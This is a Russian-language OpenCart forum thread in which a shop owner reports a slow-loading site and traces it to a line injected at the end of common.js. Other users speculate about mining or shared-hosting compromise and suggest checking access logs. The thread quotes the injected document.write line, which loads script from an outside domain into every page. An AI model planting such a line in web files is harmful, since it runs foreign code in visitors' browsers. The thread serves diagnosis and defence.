Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Взлом через common.js


Recommended Posts

Старый сайт:

OcStore 1.5 

Тема стандартная (defaut) 

 

Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 

что то такое (картинка из инета)

javabad3.png

В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 

Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 

<?php foreach ($scripts as $script) { ?>
<script type="text/javascript" src="<?php echo $script; ?>"></script>
<?php } ?>

Понимаю, что данная херота может инклудится вот сюда из любого файла

Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js

В конце файла была приписка:

document.write('<script src="https://afrodizinlife.gq"><\x2fscript>');

Собственно вопрос:

Как такие вещи вообще происходят на opencart?

P.S. По поводу паролей можно не писать: 

1. 10 значные с спецсимволами + регистры

2. В браузере не храню

3. В FileZilla тоже не храню

Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 

Или какие то минимумы, что необходимо сделать всем и вся? 

Link to comment
Share on other sites


5 минут назад, IIIBarsik сказал:

И да, если кто нибудь сможет мне пояснить, что эта херота делала у меня на сайте, буду благодарен

майнила что-то или в гугл страницу подменяла

подобные взломы в опенкарте обычно от соседей и украденных паролей

Link to comment
Share on other sites

Модули с файлопомоек или взломанные ставили? Если нет. То рядом с вами или прям на вашем хостинг-аккаунте мог быть вордпресс, их ломают и всем кто рядом суют гадости.

Edited by niger
Link to comment
Share on other sites


41 минуту назад, freelancer сказал:

посмотрите дату редактирования файла common.js

далее запросите у хостера access.log за эту дату

+1 Сняли с "языка" :)
ТС  - скорее всего вас взломали через "соседей", просто ботом внедрили в попавшиеся JS, свой код
Или какой то нерадивый "студент" (который выполнял у вас работы) вам подсунул шелл и внедрил потом майнер

 

Link to comment
Share on other sites

В 10.09.2018 в 18:13, markimax сказал:

+1 Сняли с "языка"
ТС  - скорее всего вас взломали через "соседей", просто ботом внедрили в попавшиеся JS, свой код
Или какой то нерадивый "студент" (который выполнял у вас работы) вам подсунул шелл и внедрил потом майнер

 

Можете подробнее объяснить суть взлома через "соседей"? 

"студент" отметается, ибо доступ только у 2 человек

Link to comment
Share on other sites


4 минуты назад, IIIBarsik сказал:

Можете подробнее объяснить суть взлома через "соседей"? 

"студент" отметается, ибо доступ только у 2 человек

рядом лежит вордпресс с плагинами бесплатно и без смс

либо у хостера виртуалхосты не изолированы и из скриптика можно получить доступ к соседним сайтам на других аккаунтах, таких много

Link to comment
Share on other sites

30 минут назад, spectre сказал:

рядом лежит вордпресс с плагинами бесплатно и без смс

либо у хостера виртуалхосты не изолированы и из скриптика можно получить доступ к соседним сайтам на других аккаунтах, таких много

Т.е. и в том и в другом случаях виртуалхосты не изолированны друг от друга, верно? Иначе я просто не понимаю по какой гейской магии сосед может влиять на меня

Link to comment
Share on other sites


Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.